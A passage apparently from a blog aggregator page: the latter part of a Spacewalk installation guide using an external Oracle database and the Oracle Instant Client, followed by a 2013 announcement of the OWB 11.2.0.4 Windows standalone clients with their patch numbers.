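yum repolist | grep -i spacewalk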

Install the following prerequisite packages on your Spacewalk server:

oracle-instantclient11.2-basic-11.2.0.3.0-1.x86_64
oracle-instantclient11.2-sqlplus-11.2.0.3.0-1.x86_64

rpm -ivh oracle-instantclient11.2-basic-11.2.0.3.0-1.x86_64.rpm
rpm -ivh oracle-instantclient11.2-sqlplus-11.2.0.3.0-1.x86_64.rpm

The above RPMs can be found on the Oracle Technology Network website:
http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html

As the root user, configure the library path to include the Oracle Instant Client libraries :

cd /etc/ld.so.conf.d
echo /usr/lib/oracle/11.2/client64/lib > oracle-instantclient11.2.conf
ldconfig

Install spacewalk :

# yum install spacewalk-oracle

The above yum command should download and install all of the packages required to run Spacewalk on your local server.

| NOTE: If you did a full, desktop or workstation installation,
| you have to remove the JTA package
| BEFORE installing spacewalk-oracle (rpm -e --nodeps jta)

Once the installation completes, simply run the Spacewalk configuration tool and you are all set (make sure to run the command with both arguments):

spacewalk-setup --disconnected --external-db

Answer the questions during setup; make sure you provide the database user (example: spacewalk), the password (example: spacewalk), and the database server hostname (the standard hostname of the server on which you have deployed the Oracle Database).

At the end of the setup script, your Spacewalk server should be fully configured and you can log into the web portal. Use your favorite browser to connect to the website: http://[spacewalkserverhostname]

The very first action will be to create the main admin account.

OWB - 11.2.0.4 Windows standalone client released

Antonio Romero - Wed, 2013-11-06 13:37

The 11.2.0.4 release of OWB, containing the 32-bit and 64-bit standalone Windows clients, is released today; I had previously blogged about the Linux standalone client here. Big thanks to Anil for spearheading that, another milestone on the Data Integration roadmap.

Below are the patch numbers:

  • 17743124 - OWB 11.2.0.4 STANDALONE CLIENT FOR Windows 64 BIT
  • 17743119 - OWB 11.2.0.4 STANDALONE CLIENT FOR Windows 32 BIT

This is the terminal release of OWB and customer bugs will be resolved on top of this release. We are excited to share information on the Oracle Data Integration 12c release in our upcoming launch video webcast on November 12th.
